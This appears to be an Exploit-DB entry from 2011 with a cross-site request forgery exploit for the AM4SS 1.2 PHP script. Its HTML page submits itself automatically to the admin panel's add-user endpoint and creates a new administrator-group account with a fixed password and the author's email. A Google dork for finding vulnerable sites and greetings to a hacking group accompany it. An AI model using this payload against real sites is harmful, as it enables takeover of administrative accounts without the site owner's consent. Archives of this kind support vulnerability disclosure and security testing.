AM4SS 1.2 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

17800

CVE:

EDB Verified:

Author:

red virus

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-09-08

Vulnerable App:

#Title    :  AM4SS Version 1.2  - CSRF add Admin
#Script   :  AM4SS Version 1.2
#Language : Php
#Download : http://am4ss.org/am4ss.tar.gz                 
#Date     : 2011/09/09
#Version  : 1.2
#Dork     : "Powered by AM4SS "
#Found    : by red virus >>> c3o@w.cn
#Homepage : www.alm3refh.com
 
 
 
<html>
<form  name="r3dvirus" action="http://localhost/am4ss/admincp/users.php?do=add" method="post">
<input value="egypt"  name="userfullname" type="text" /> 									
<input value="123456"   name="password" type="text" /> 									
<input value="c3o@w.cn"  name="useremail" type="text" />							
<input value="EG"  name="country" type="text" />
<input value="3"  name="usergroup" type="text" />
<input value="save"  name="do" type="text" />																
</form>
<script>document.r3dvirus.submit();</script>
</html>

###########################################################################################################
greats 2
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man
infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services